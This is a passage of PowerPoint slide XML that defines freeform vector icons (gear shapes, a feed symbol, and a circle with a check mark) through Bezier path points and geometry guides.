                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="47" y="50"/>
                  <a:pt x="47" y="50"/>
                  <a:pt x="47" y="50"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="46" y="52"/>
                  <a:pt x="42" y="56"/>
                  <a:pt x="41" y="56"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="40" y="56"/>
                  <a:pt x="40" y="56"/>
                  <a:pt x="40" y="56"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="35" y="53"/>
                  <a:pt x="35" y="53"/>
                  <a:pt x="35" y="53"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="34" y="53"/>
                  <a:pt x="33" y="53"/>
                  <a:pt x="32" y="54"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="32" y="56"/>
                  <a:pt x="32" y="58"/>
                  <a:pt x="31" y="60"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="31" y="61"/>
                  <a:pt x="30" y="61"/>
                  <a:pt x="30" y="61"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="22" y="61"/>
                  <a:pt x="22" y="61"/>
                  <a:pt x="22" y="61"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="22" y="61"/>
                  <a:pt x="21" y="61"/>
                  <a:pt x="21" y="60"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20" y="54"/>
                  <a:pt x="20" y="54"/>
                  <a:pt x="20" y="54"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19" y="54"/>
                  <a:pt x="18" y="53"/>
                  <a:pt x="17" y="53"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13" y="56"/>
                  <a:pt x="13" y="56"/>
                  <a:pt x="13" y="56"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12" y="56"/>
                  <a:pt x="12" y="56"/>
                  <a:pt x="12" y="56"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11" y="56"/>
                  <a:pt x="11" y="56"/>
                  <a:pt x="11" y="56"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10" y="55"/>
                  <a:pt x="5" y="51"/>
                  <a:pt x="5" y="50"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5" y="49"/>
                  <a:pt x="5" y="49"/>
                  <a:pt x="5" y="49"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7" y="47"/>
                  <a:pt x="8" y="46"/>
                  <a:pt x="9" y="44"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8" y="43"/>
                  <a:pt x="8" y="42"/>
                  <a:pt x="8" y="41"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1" y="40"/>
                  <a:pt x="1" y="40"/>
                  <a:pt x="1" y="40"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1" y="40"/>
                  <a:pt x="0" y="40"/>
                  <a:pt x="0" y="39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1"/>
                  <a:pt x="1" y="30"/>
                  <a:pt x="1" y="30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8"/>
                  <a:pt x="8" y="27"/>
                  <a:pt x="9" y="26"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8" y="25"/>
                  <a:pt x="7" y="23"/>
                  <a:pt x="5" y="22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0"/>
                  <a:pt x="5" y="20"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6" y="19"/>
                  <a:pt x="11" y="14"/>
                  <a:pt x="12" y="14"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12" y="14"/>
                  <a:pt x="12" y="14"/>
                  <a:pt x="13" y="14"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17" y="18"/>
                  <a:pt x="17" y="18"/>
                  <a:pt x="17" y="18"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18" y="18"/>
                  <a:pt x="19" y="17"/>
                  <a:pt x="20" y="17"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21" y="15"/>
                  <a:pt x="21" y="13"/>
                  <a:pt x="21" y="11"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21" y="10"/>
                  <a:pt x="22" y="10"/>
                  <a:pt x="22" y="10"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="30" y="10"/>
                  <a:pt x="30" y="10"/>
                  <a:pt x="30" y="10"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="30" y="10"/>
                  <a:pt x="31" y="10"/>
                  <a:pt x="31" y="11"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="32" y="17"/>
                  <a:pt x="32" y="17"/>
                  <a:pt x="32" y="17"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="33" y="17"/>
                  <a:pt x="34" y="18"/>
                  <a:pt x="35" y="18"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="40" y="14"/>
                  <a:pt x="40" y="14"/>
                  <a:pt x="40" y="14"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="40" y="14"/>
                  <a:pt x="40" y="14"/>
                  <a:pt x="41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2" y="15"/>
                  <a:pt x="47" y="20"/>
                  <a:pt x="47" y="21"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="47" y="21"/>
                  <a:pt x="47" y="21"/>
                  <a:pt x="47" y="22"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="46" y="23"/>
                  <a:pt x="45" y="25"/>
                  <a:pt x="43" y="26"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="44" y="27"/>
                  <a:pt x="44" y="28"/>
                  <a:pt x="45" y="30"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="51" y="30"/>
                  <a:pt x="51" y="30"/>
                  <a:pt x="51" y="30"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="51" y="31"/>
                  <a:pt x="52" y="31"/>
                  <a:pt x="52" y="32"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="52" y="39"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="26" y="25"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="21" y="25"/>
                  <a:pt x="16" y="30"/>
                  <a:pt x="16" y="35"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16" y="41"/>
                  <a:pt x="21" y="46"/>
                  <a:pt x="26" y="46"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="32" y="46"/>
                  <a:pt x="36" y="41"/>
                  <a:pt x="36" y="35"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="36" y="30"/>
                  <a:pt x="32" y="25"/>
                  <a:pt x="26" y="25"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="78" y="18"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="78" y="18"/>
                  <a:pt x="72" y="19"/>
                  <a:pt x="72" y="19"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="71" y="20"/>
                  <a:pt x="71" y="20"/>
                  <a:pt x="70" y="21"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="71" y="22"/>
                  <a:pt x="72" y="26"/>
                  <a:pt x="72" y="26"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="72" y="27"/>
                  <a:pt x="72" y="27"/>
                  <a:pt x="72" y="27"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="72" y="27"/>
                  <a:pt x="68" y="30"/>
                  <a:pt x="67" y="30"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="67" y="30"/>
                  <a:pt x="64" y="26"/>
                  <a:pt x="63" y="25"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="63" y="25"/>
                  <a:pt x="63" y="25"/>
                  <a:pt x="62" y="25"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="62" y="25"/>
                  <a:pt x="61" y="25"/>
                  <a:pt x="61" y="25"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="61" y="26"/>
                  <a:pt x="58" y="30"/>
                  <a:pt x="57" y="30"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="57" y="30"/>
                  <a:pt x="53" y="27"/>
                  <a:pt x="52" y="27"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="52" y="27"/>
                  <a:pt x="52" y="27"/>
                  <a:pt x="52" y="26"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="52" y="26"/>
                  <a:pt x="54" y="22"/>
                  <a:pt x="54" y="21"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="53" y="20"/>
                  <a:pt x="53" y="20"/>
                  <a:pt x="53" y="19"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="52" y="19"/>
                  <a:pt x="47" y="18"/>
                  <a:pt x="47" y="18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11"/>
                  <a:pt x="52" y="11"/>
                  <a:pt x="53" y="11"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="53" y="10"/>
                  <a:pt x="53" y="9"/>
                  <a:pt x="54" y="9"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="54" y="8"/>
                  <a:pt x="52" y="4"/>
                  <a:pt x="52" y="3"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="52" y="3"/>
                  <a:pt x="52" y="3"/>
                  <a:pt x="52" y="3"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="53" y="3"/>
                  <a:pt x="57" y="0"/>
                  <a:pt x="57" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="58" y="0"/>
                  <a:pt x="61" y="4"/>
                  <a:pt x="61" y="5"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="61" y="4"/>
                  <a:pt x="62" y="4"/>
                  <a:pt x="62" y="4"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="63" y="4"/>
                  <a:pt x="63" y="4"/>
                  <a:pt x="63" y="5"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="64" y="3"/>
                  <a:pt x="66" y="1"/>
                  <a:pt x="67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72" y="2"/>
                  <a:pt x="72" y="3"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="72" y="3"/>
                  <a:pt x="72" y="3"/>
                  <a:pt x="72" y="3"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="72" y="4"/>
                  <a:pt x="71" y="8"/>
                  <a:pt x="70" y="9"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="71" y="9"/>
                  <a:pt x="71" y="10"/>
                  <a:pt x="72" y="11"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="72" y="11"/>
                  <a:pt x="78" y="11"/>
                  <a:pt x="78" y="12"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="78" y="18"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="78" y="59"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="78" y="59"/>
                  <a:pt x="72" y="60"/>
                  <a:pt x="72" y="60"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="71" y="61"/>
                  <a:pt x="71" y="61"/>
                  <a:pt x="70" y="62"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="71" y="63"/>
                  <a:pt x="72" y="67"/>
                  <a:pt x="72" y="68"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="72" y="68"/>
                  <a:pt x="72" y="68"/>
                  <a:pt x="72" y="68"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="72" y="68"/>
                  <a:pt x="68" y="71"/>
                  <a:pt x="67" y="71"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="67" y="71"/>
                  <a:pt x="64" y="67"/>
                  <a:pt x="63" y="66"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="63" y="66"/>
                  <a:pt x="63" y="66"/>
                  <a:pt x="62" y="66"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="62" y="66"/>
                  <a:pt x="61" y="66"/>
                  <a:pt x="61" y="66"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="61" y="67"/>
                  <a:pt x="58" y="71"/>
                  <a:pt x="57" y="71"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="57" y="71"/>
                  <a:pt x="53" y="68"/>
                  <a:pt x="52" y="68"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="52" y="68"/>
                  <a:pt x="52" y="68"/>
                  <a:pt x="52" y="68"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="52" y="67"/>
                  <a:pt x="54" y="63"/>
                  <a:pt x="54" y="62"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="53" y="61"/>
                  <a:pt x="53" y="61"/>
                  <a:pt x="53" y="60"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="52" y="60"/>
                  <a:pt x="47" y="59"/>
                  <a:pt x="47" y="59"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="47" y="53"/>
                  <a:pt x="47" y="53"/>
                  <a:pt x="47" y="53"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="47" y="52"/>
                  <a:pt x="52" y="52"/>
                  <a:pt x="53" y="52"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="53" y="51"/>
                  <a:pt x="53" y="50"/>
                  <a:pt x="54" y="50"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="54" y="49"/>
                  <a:pt x="52" y="45"/>
                  <a:pt x="52" y="44"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="52" y="44"/>
                  <a:pt x="52" y="44"/>
                  <a:pt x="52" y="44"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="53" y="44"/>
                  <a:pt x="57" y="41"/>
                  <a:pt x="57" y="41"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="58" y="41"/>
                  <a:pt x="61" y="45"/>
                  <a:pt x="61" y="46"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="61" y="46"/>
                  <a:pt x="62" y="46"/>
                  <a:pt x="62" y="46"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="63" y="46"/>
                  <a:pt x="63" y="46"/>
                  <a:pt x="63" y="46"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="64" y="44"/>
                  <a:pt x="66" y="43"/>
                  <a:pt x="67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68" y="41"/>
                  <a:pt x="72" y="44"/>
                  <a:pt x="72" y="44"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="72" y="44"/>
                  <a:pt x="72" y="44"/>
                  <a:pt x="72" y="44"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="72" y="45"/>
                  <a:pt x="71" y="49"/>
                  <a:pt x="70" y="50"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="71" y="50"/>
                  <a:pt x="71" y="51"/>
                  <a:pt x="72" y="52"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="72" y="52"/>
                  <a:pt x="78" y="52"/>
                  <a:pt x="78" y="53"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="78" y="59"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="62" y="10"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="59" y="10"/>
                  <a:pt x="57" y="12"/>
                  <a:pt x="57" y="15"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="57" y="18"/>
                  <a:pt x="59" y="20"/>
                  <a:pt x="62" y="20"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="65" y="20"/>
                  <a:pt x="67" y="18"/>
                  <a:pt x="67" y="15"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="67" y="12"/>
                  <a:pt x="65" y="10"/>
                  <a:pt x="62" y="10"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="62" y="51"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="59" y="51"/>
                  <a:pt x="57" y="53"/>
                  <a:pt x="57" y="56"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="57" y="59"/>
                  <a:pt x="59" y="61"/>
                  <a:pt x="62" y="61"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="65" y="61"/>
                  <a:pt x="67" y="59"/>
                  <a:pt x="67" y="56"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="67" y="53"/>
                  <a:pt x="65" y="51"/>
                  <a:pt x="62" y="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64" name="Freeform 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A88DAEDA-41BC-4999-A5EF-63315E980443}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9633160" y="1091728"/>
            <a:ext cx="476513" cy="476513"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 344438 w 256"/>
              <a:gd name="T1" fmla="*/ 415925 h 256"/>
              <a:gd name="T2" fmla="*/ 0 w 256"/>
              <a:gd name="T3" fmla="*/ 71487 h 256"/>
              <a:gd name="T4" fmla="*/ 0 w 256"/>
              <a:gd name="T5" fmla="*/ 0 h 256"/>
              <a:gd name="T6" fmla="*/ 415925 w 256"/>
              <a:gd name="T7" fmla="*/ 415925 h 256"/>
              <a:gd name="T8" fmla="*/ 344438 w 256"/>
              <a:gd name="T9" fmla="*/ 415925 h 256"/>
              <a:gd name="T10" fmla="*/ 266452 w 256"/>
              <a:gd name="T11" fmla="*/ 415925 h 256"/>
              <a:gd name="T12" fmla="*/ 194965 w 256"/>
              <a:gd name="T13" fmla="*/ 415925 h 256"/>
              <a:gd name="T14" fmla="*/ 0 w 256"/>
              <a:gd name="T15" fmla="*/ 220960 h 256"/>
              <a:gd name="T16" fmla="*/ 0 w 256"/>
              <a:gd name="T17" fmla="*/ 149473 h 256"/>
              <a:gd name="T18" fmla="*/ 266452 w 256"/>
              <a:gd name="T19" fmla="*/ 415925 h 256"/>
              <a:gd name="T20" fmla="*/ 51991 w 256"/>
              <a:gd name="T21" fmla="*/ 311944 h 256"/>
              <a:gd name="T22" fmla="*/ 103981 w 256"/>
              <a:gd name="T23" fmla="*/ 363934 h 256"/>
              <a:gd name="T24" fmla="*/ 51991 w 256"/>
              <a:gd name="T25" fmla="*/ 415925 h 256"/>
              <a:gd name="T26" fmla="*/ 0 w 256"/>
              <a:gd name="T27" fmla="*/ 363934 h 256"/>
              <a:gd name="T28" fmla="*/ 51991 w 256"/>
              <a:gd name="T29" fmla="*/ 311944 h 25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256" h="256">
                <a:moveTo>
                  <a:pt x="212" y="256"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="212" y="139"/>
                  <a:pt x="117" y="44"/>
                  <a:pt x="0" y="44"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="0"/>
                  <a:pt x="0" y="0"/>
                  <a:pt x="0" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="141" y="0"/>
                  <a:pt x="256" y="115"/>
                  <a:pt x="256" y="256"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="212" y="256"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="164" y="256"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="120" y="256"/>
                  <a:pt x="120" y="256"/>
                  <a:pt x="120" y="256"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="120" y="190"/>
                  <a:pt x="66" y="136"/>
                  <a:pt x="0" y="136"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="92"/>
                  <a:pt x="0" y="92"/>
                  <a:pt x="0" y="92"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="91" y="92"/>
                  <a:pt x="164" y="165"/>
                  <a:pt x="164" y="256"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="32" y="192"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="50" y="192"/>
                  <a:pt x="64" y="206"/>
                  <a:pt x="64" y="224"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="64" y="242"/>
                  <a:pt x="50" y="256"/>
                  <a:pt x="32" y="256"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14" y="256"/>
                  <a:pt x="0" y="242"/>
                  <a:pt x="0" y="224"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="206"/>
                  <a:pt x="14" y="192"/>
                  <a:pt x="32" y="192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65" name="Freeform 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92FF70C6-1D89-4917-A08F-26E2E210A305}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9049795" y="1100328"/>
            <a:ext cx="355460" cy="347472"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 282575 w 112"/>
              <a:gd name="T1" fmla="*/ 20273 h 109"/>
              <a:gd name="T2" fmla="*/ 262391 w 112"/>
              <a:gd name="T3" fmla="*/ 0 h 109"/>
              <a:gd name="T4" fmla="*/ 216977 w 112"/>
              <a:gd name="T5" fmla="*/ 53218 h 109"/>
              <a:gd name="T6" fmla="*/ 128673 w 112"/>
              <a:gd name="T7" fmla="*/ 17739 h 109"/>
              <a:gd name="T8" fmla="*/ 0 w 112"/>
              <a:gd name="T9" fmla="*/ 146982 h 109"/>
              <a:gd name="T10" fmla="*/ 128673 w 112"/>
              <a:gd name="T11" fmla="*/ 276225 h 109"/>
              <a:gd name="T12" fmla="*/ 257345 w 112"/>
              <a:gd name="T13" fmla="*/ 146982 h 109"/>
              <a:gd name="T14" fmla="*/ 237161 w 112"/>
              <a:gd name="T15" fmla="*/ 78559 h 109"/>
              <a:gd name="T16" fmla="*/ 282575 w 112"/>
              <a:gd name="T17" fmla="*/ 20273 h 109"/>
              <a:gd name="T18" fmla="*/ 239684 w 112"/>
              <a:gd name="T19" fmla="*/ 146982 h 109"/>
              <a:gd name="T20" fmla="*/ 128673 w 112"/>
              <a:gd name="T21" fmla="*/ 255952 h 109"/>
              <a:gd name="T22" fmla="*/ 20184 w 112"/>
              <a:gd name="T23" fmla="*/ 146982 h 109"/>
              <a:gd name="T24" fmla="*/ 128673 w 112"/>
              <a:gd name="T25" fmla="*/ 35478 h 109"/>
              <a:gd name="T26" fmla="*/ 204362 w 112"/>
              <a:gd name="T27" fmla="*/ 65889 h 109"/>
              <a:gd name="T28" fmla="*/ 126150 w 112"/>
              <a:gd name="T29" fmla="*/ 157119 h 109"/>
              <a:gd name="T30" fmla="*/ 65598 w 112"/>
              <a:gd name="T31" fmla="*/ 98833 h 109"/>
              <a:gd name="T32" fmla="*/ 45414 w 112"/>
              <a:gd name="T33" fmla="*/ 136845 h 109"/>
              <a:gd name="T34" fmla="*/ 108489 w 112"/>
              <a:gd name="T35" fmla="*/ 207802 h 109"/>
              <a:gd name="T36" fmla="*/ 121104 w 112"/>
              <a:gd name="T37" fmla="*/ 225542 h 109"/>
              <a:gd name="T38" fmla="*/ 136242 w 112"/>
              <a:gd name="T39" fmla="*/ 207802 h 109"/>
              <a:gd name="T40" fmla="*/ 224546 w 112"/>
              <a:gd name="T41" fmla="*/ 93764 h 109"/>
              <a:gd name="T42" fmla="*/ 239684 w 112"/>
              <a:gd name="T43" fmla="*/ 146982 h 10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12" h="109">
                <a:moveTo>
                  <a:pt x="112" y="8"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="104" y="0"/>
                  <a:pt x="104" y="0"/>
                  <a:pt x="104" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="86" y="21"/>
                  <a:pt x="86" y="21"/>
                  <a:pt x="86" y="21"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="77" y="12"/>
                  <a:pt x="65" y="7"/>
                  <a:pt x="51" y="7"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="23" y="7"/>
                  <a:pt x="0" y="30"/>
                  <a:pt x="0" y="58"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="86"/>
                  <a:pt x="23" y="109"/>
                  <a:pt x="51" y="109"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="79" y="109"/>
                  <a:pt x="102" y="86"/>
                  <a:pt x="102" y="58"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="102" y="48"/>
                  <a:pt x="99" y="38"/>
                  <a:pt x="94" y="31"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="112" y="8"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="95" y="58"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="95" y="82"/>
                  <a:pt x="75" y="101"/>
                  <a:pt x="51" y="101"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="27" y="101"/>
                  <a:pt x="8" y="82"/>
                  <a:pt x="8" y="58"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8" y="34"/>
                  <a:pt x="27" y="14"/>
                  <a:pt x="51" y="14"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="63" y="14"/>
                  <a:pt x="73" y="19"/>
                  <a:pt x="81" y="26"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="50" y="62"/>
                  <a:pt x="50" y="62"/>
                  <a:pt x="50" y="62"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="26" y="39"/>
                  <a:pt x="26" y="39"/>
                  <a:pt x="26" y="39"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18" y="54"/>
                  <a:pt x="18" y="54"/>
                  <a:pt x="18" y="54"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="43" y="82"/>
                  <a:pt x="43" y="82"/>
                  <a:pt x="43" y="82"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="48" y="89"/>
                  <a:pt x="48" y="89"/>
                  <a:pt x="48" y="89"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="54" y="82"/>
                  <a:pt x="54" y="82"/>
                  <a:pt x="54" y="82"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="89" y="37"/>
                  <a:pt x="89" y="37"/>
                  <a:pt x="89" y="37"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="93" y="43"/>
                  <a:pt x="95" y="50"/>
                  <a:pt x="95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66" name="Freeform 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5901966B-9791-44B4-937C-688ACCF74542}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9128544" y="3150327"/>
            <a:ext cx="522729" cy="441854"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 16433 w 256"/>
              <a:gd name="T1" fmla="*/ 355600 h 216"/>
              <a:gd name="T2" fmla="*/ 404254 w 256"/>
              <a:gd name="T3" fmla="*/ 355600 h 216"/>
              <a:gd name="T4" fmla="*/ 420687 w 256"/>
              <a:gd name="T5" fmla="*/ 339137 h 216"/>
              <a:gd name="T6" fmla="*/ 420687 w 256"/>
              <a:gd name="T7" fmla="*/ 332552 h 216"/>
              <a:gd name="T8" fmla="*/ 404254 w 256"/>
              <a:gd name="T9" fmla="*/ 316089 h 216"/>
